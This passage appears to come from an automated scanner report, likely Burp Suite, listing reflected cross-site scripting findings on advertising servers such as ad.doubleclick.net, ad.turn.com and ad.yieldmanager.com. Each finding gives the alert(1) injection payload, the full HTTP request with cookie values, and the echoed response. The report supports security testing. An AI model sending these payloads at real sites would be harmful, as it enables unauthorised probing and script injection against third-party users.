The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 43e13"style%3d"x%3aexpression(alert(1))"6815619fe6d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 43e13"style="x:expression(alert(1))"6815619fe6d in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/markets_newsreel;u=;;;mc=b2pfreezone;tile=1;sz=2x94;ord=4782478247824782;&43e13"style%3d"x%3aexpression(alert(1))"6815619fe6d =1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://online.wsj.com/public/page/0_0_WP_2300_NewsReel.html?baseDocId=SB10001424053111904233404576462461660747244 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 422 Date: Sat, 23 Jul 2011 04:31:24 GMT <head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/h;44306;0-0;0;31680216;31596-2/94;0/0/0;u=;~okv=;u=;;;mc=b2pfreezone;tile=1;sz=2x94;&43e13"style="x:expression(alert(1))"6815619fe6d =1;~aopt=2/1/ff/1;~sscs=%3f">...[SNIP]...
3.23. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel [u parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/interactive.wsj.com/markets_newsreel
Issue detail
The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da5f6"style%3d"x%3aexpression(alert(1))"3f1246fe48e was submitted in the u parameter. This input was echoed as da5f6"style="x:expression(alert(1))"3f1246fe48e in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/markets_newsreel;u=;;;mc=b2pfreezone;tile=1;sz=2x94;ord=4782478247824782;da5f6"style%3d"x%3aexpression(alert(1))"3f1246fe48e HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://online.wsj.com/public/page/0_0_WP_2300_NewsReel.html?baseDocId=SB10001424053111904233404576462461660747244 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 419 Date: Sat, 23 Jul 2011 04:31:19 GMT <head><title>Click Here</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/h;44306;0-0;0;31680216;31596-2/94;0/0/0;u=;~okv=;u=;;;mc=b2pfreezone;tile=1;sz=2x94;da5f6"style="x:expression(alert(1))"3f1246fe48e ;~aopt=2/1/ff/1;~sscs=%3f">...[SNIP]...
3.24. http://ad.doubleclick.net/adj/N2883.132636.QUADRANTONE.COM/B5629721.18 [sz parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/N2883.132636.QUADRANTONE.COM/B5629721.18
Issue detail
The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a0c9'-alert(1)-'10a8566025f was submitted in the sz parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/N2883.132636.QUADRANTONE.COM/B5629721.18;sz=8a0c9'-alert(1)-'10a8566025f HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 36606 Cache-Control: no-cache Pragma: no-cache Date: Sat, 23 Jul 2011 13:48:38 GMT Expires: Sat, 23 Jul 2011 13:48:38 GMT document.write(''); if(typeof(dartCallbackObjects) == "undefined") var dartCallbackObjects = new Array(); if(typeof(dartCreativeDisplayManagers) == "undefined") var dartCreativeDisplayManagers = ...[SNIP]... ttp://ad.doubleclick.net/activity;src=3149779;stragg=1;v=1;pid=65553367;aid=242867278;ko=0;cid=42426448;rid=42444235;rv=2;rn=2872633;"; this.swfParams = 'src=3149779&rv=2&rid=42444235&=8a0c9'-alert(1)-'10a8566025f &'; this.renderingId = "42444235"; this.previewMode = (("%PreviewMode" == "true") ? true : false); this.debugEventsMode = (("%DebugEventsMode" == "true")...[SNIP]...
3.25. http://ad.doubleclick.net/adj/lfs2.lifescript/conditions [path parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/lfs2.lifescript/conditions
Issue detail
The value of the path request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bf736'%3balert(1)//b8265541d86 was submitted in the path parameter. This input was echoed as bf736';alert(1)//b8265541d86 in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/lfs2.lifescript/conditions;path=bf736'%3balert(1)//b8265541d86 HTTP/1.1 Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;dcopt=ist;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=1;sz=728x90;ord=101352252258050 Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 286 Cache-Control: no-cache Pragma: no-cache Date: Thu, 21 Jul 2011 19:22:58 GMT Expires: Thu, 21 Jul 2011 19:22:58 GMT document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b4b/0/0/%2a/y;44306;0-0;0;31210306;3454-728/90;0/0/0;;~okv=;path=bf736';alert(1)//b8265541d86 ;~sscs=%3f"><img src="http:/...[SNIP]...
3.26. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/ostg.sourceforge/cons_none_p71_text
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61790'-alert(1)-'fcbfe393cb3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.sourceforge/cons_none_p71_text;pg=/projects;psrch=0;logged_in=0;tpc=hoytllc-vcloud;tile=2;sz=;ord=2861515760451365?&61790'-alert(1)-'fcbfe393cb3 =1 HTTP/1.1 Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://sourceforge.net/projects/hoytllc-vcloud/ Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 341 Date: Sat, 23 Jul 2011 04:42:43 GMT document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/m;44306;0-0;0;38027281;255-0/0;0/0/0;;~okv=;pg=/projects;psrch=0;logged_in=0;tpc=hoytllc-vcloud;tile=2;sz=;;61790'-alert(1)-'fcbfe393cb3 =1;~sscs=%3f">...[SNIP]...
3.27. http://ad.doubleclick.net/adj/ostg.sourceforge/cons_none_p71_text [pg parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/ostg.sourceforge/cons_none_p71_text
Issue detail
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc625'%3balert(1)//e12694d7dfb was submitted in the pg parameter. This input was echoed as cc625';alert(1)//e12694d7dfb in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.sourceforge/cons_none_p71_text;pg=cc625'%3balert(1)//e12694d7dfb HTTP/1.1 Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://sourceforge.net/projects/hoytllc-vcloud/ Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 278 Cache-Control: no-cache Pragma: no-cache Date: Sat, 23 Jul 2011 04:42:39 GMT Expires: Sat, 23 Jul 2011 04:42:39 GMT document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/m;44306;0-0;0;38027281;255-0/0;0/0/0;;~okv=;pg=cc625';alert(1)//e12694d7dfb ;~sscs=%3f"><img src="http://s0.2mdn...[SNIP]...
3.28. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/ostg.sourceforge/pg_viewvc_p88_shortrec
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1062a'%3balert(1)//19c389f15b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1062a';alert(1)//19c389f15b in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.sourceforge/pg_viewvc_p88_shortrec;pg=viewvc;tile=1;tpc=hoytllc-vcloud;ord=7437528464769978;sz=1x1?&1062a'%3balert(1)//19c389f15b =1 HTTP/1.1 Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hoytllc-vcloud.svn.sourceforge.net/ Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 342 Date: Sat, 23 Jul 2011 04:42:56 GMT document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/d;44306;0-0;0;30748661;31-1/1;0/0/0;;~okv=;pg=viewvc;tile=1;tpc=hoytllc-vcloud;sz=1x1?&1062a';alert(1)//19c389f15b =1;bsg=109738;bsg=109741;;~sscs=%3f">...[SNIP]...
3.29. http://ad.doubleclick.net/adj/ostg.sourceforge/pg_viewvc_p88_shortrec [pg parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adj/ostg.sourceforge/pg_viewvc_p88_shortrec
Issue detail
The value of the pg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe9a9'%3balert(1)//049934a0fac was submitted in the pg parameter. This input was echoed as fe9a9';alert(1)//049934a0fac in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /adj/ostg.sourceforge/pg_viewvc_p88_shortrec;pg=fe9a9'%3balert(1)//049934a0fac HTTP/1.1 Host: ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hoytllc-vcloud.svn.sourceforge.net/ Cookie: id=2230b5db2501004b||t=1311254584|et=730|cs=002213fd48635305ba9b0e4419
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: application/x-javascript Content-Length: 301 Cache-Control: no-cache Pragma: no-cache Date: Sat, 23 Jul 2011 04:42:53 GMT Expires: Sat, 23 Jul 2011 04:42:53 GMT document.write('<a target="_top" href="http://ad.doubleclick.net/click;h=v8/3b4d/0/0/%2a/k;44306;0-0;0;30748661;255-0/0;0/0/0;;~okv=;pg=fe9a9';alert(1)//049934a0fac ;bsg=109738;bsg=109741;;~sscs=%3f"><...[SNIP]...
3.30. http://ad.turn.com/server/pixel.htm [fpid parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.turn.com
Path:
/server/pixel.htm
Issue detail
The value of the fpid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 35290"><script>alert(1)</script>9abbec4719c was submitted in the fpid parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=35290"><script>alert(1)</script>9abbec4719c &sp=y HTTP/1.1 Host: ad.turn.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922 Cookie: uid=4146544210108361256; pf=nZySyOPeh2ug-66f3S_YJ-08eNO3kJ_g1J0ui0giN0IO9arxyxx0God0z89jjC5u7B_Md7IXVjaLRc76_SNpoZsbEDch1o94tTK7X4mzUCMC35RnwUiMoGkJYCinoxtJgfaE0IC8cyLwhG_8rfNFZKo408BxR9uazB8jKSDnLvk; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7Cundefined%7Cundefined%7C15177%7C15177%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15177; rv=1
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:00:58 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Thu, 21 Jul 2011 18:00:58 GMT Content-Length: 384 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com/server/ddc.htm?uid=4146544210108361256&rnd=8293284759505948787&fpid=35290"><script>alert(1)</script>9abbec4719c &nu=n&t=&sp=y&purl=&ctid=1" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no">...[SNIP]...
3.31. http://ad.turn.com/server/pixel.htm [sp parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.turn.com
Path:
/server/pixel.htm
Issue detail
The value of the sp request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18b8d"><script>alert(1)</script>02186be73ca was submitted in the sp parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /server/pixel.htm?fpid=1&sp=18b8d"><script>alert(1)</script>02186be73ca HTTP/1.1 Host: ad.turn.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922 Cookie: uid=4146544210108361256; pf=nZySyOPeh2ug-66f3S_YJ-08eNO3kJ_g1J0ui0giN0IO9arxyxx0God0z89jjC5u7B_Md7IXVjaLRc76_SNpoZsbEDch1o94tTK7X4mzUCMC35RnwUiMoGkJYCinoxtJgfaE0IC8cyLwhG_8rfNFZKo408BxR9uazB8jKSDnLvk; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7Cundefined%7Cundefined%7C15177%7C15177%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15177; rv=1
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:00:58 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Thu, 21 Jul 2011 18:00:57 GMT Content-Length: 384 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com/server/ddc.htm?uid=4146544210108361256&rnd=2626437605781778254&fpid=1&nu=n&t=&sp=18b8d"><script>alert(1)</script>02186be73ca &purl=&ctid=1" marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no">...[SNIP]...
3.32. http://ad.yieldmanager.com/st [name of an arbitrarily supplied request parameter]
previous
next
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.yieldmanager.com
Path:
/st
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b090d"><script>alert(1)</script>b3e751e2978 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /st?ad_type=iframe&ad_size=728x90§ion=806254&b090d"><script>alert(1)</script>b3e751e2978 =1 HTTP/1.1 Host: ad.yieldmanager.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer= User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: pc1="b!!!!#!!$gD!!E))!#CIx!0Q]c!$mX/!!H<)!?5%!)e-O=!wVd.!!6nX!!?^T!%hMd~~~~~=%3Ve=%@S6M.jTN"; pv1="b!!!!V!#`UZ!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U]!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`U_!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#`Ua!,x.^!%)<k!.XR3!$y15!(wv]!!?5%)drC?!w1K*!(#l)!#rxb!%vSQ~~~~~=)m_O=.)IY~!#RZY!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ[!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ^!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!#RZ`!,x.^!%)<k!,y[%!$_E6!+,Cq!!5/$)drC?!w1K*!(#l)!#rxb!%UTC~~~~~=)man=.)Kx~!$*Jd!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jh!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Jl!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$*Js!,x.^!%)<k!294N!%hts!0]'O!!QB()drC?!w1K*!(#l)!#rxb!'x[Q~~~~~=)mhK=.)RU~!$%fl!,x.^!%)<k!1Z@/!%b<W!>KQu!?5%!*)6L<!w1K*!(#l)!%C9A!'oXj~~~~~=)n$<=)yxe!!!%Q!$,b_!,x.^!%)<k!2Cr6!%nRd!4sox!#1g.*ERU>!w1K*!(#l)!%C9A!()+8~~~~~=)naG=*/YB!!!#G!#LI8!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#LI9!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!$2Fq!,x.^!%)<k!1YRS!%xxG!@1^,!!5/$*)6L=!w1K*!(#l)!%C9A!(6Em~~~~~=)n'g=*.wb!!!#G!#k92!,x.^!%)<k!/wxM!%>S,!A$74!!5/$*)6L=!w1K*!(#l)!%C9A!'By+~~~~~=)n(a=*.x[!!!#G!#uei!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<>!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!$*<A!,x.^!%)<k!3!Yk!%y'Q!B>*A!!5/$*)6L=!w1K*!(#l)!%C9A!(6LU~~~~~=)n*.=*/!)!!!#G!#w`V!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!#w`Y!,x.^!%)<k!1#HT!%T+(!N9!_!?5%!*)6L<!w1K*!(#l)!%C9A!'_2u~~~~~=)n7j=*/0e!!!#G!$/E:!,x.^!%)<k!2g>n!%svw!D#5Q!!5/$*)6L=!w1K*!(#l)!%C9A!(0#g~~~~~=)n,#=*/#v!!!-V!#Np@!,x.^!%)<k!0Ehb!%H?v!Dng[!?5%!*)6L<!w1K*!(#l)!%C9A!'OU!~~~~~=)n,v=*!)H!!!#G!!4hJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*m6_!!!!a!#'jB!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jF!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jJ!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#'jM!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!#h@a!,x.^!%)<k!/pid!%<ZF!)F7c!?5%!*ERU=!w1K*!(#l)!%C9A!'@^+~~~~~=)nPE=*/I@!!!#G!!L7_!,x.^!%)<k!,+Yc!#WUL!H<'!!!5/$*)6LA!w1K*!(#l)!%Oo9!$8eI~~~~~=)n0b=*lo#M.jTN!#v8S!,x.^!%)<k!1kL!!%e@!!JGK7!!5/$*)6L=!w1K*!(#l)!%C9A!'sVe~~~~~=)n3*=*/,$!!!#G!#ut0!,x.^!%)<k!1-6r!%W+=!Uu+O!!vZ,*ERU>!w1K*!(#l)!%C9A!'bnS~~~~~=)nAe=*/9`!!!#G!#q(2!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*/8f!!!#G!#wjV!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)nl2!!!#G!#wjW!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)okp!!!#G!#wjX!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)q?u!!!#G!#wjY!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=)t?(!!!#G!#wjZ!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#l)!%C9A!']N8~~~~~=)n@k=*!==!!!#G!#wj[!,x.^!%)<k!0w#]!%R[S!UOjM!?5%!*ERU=!w1K*!(#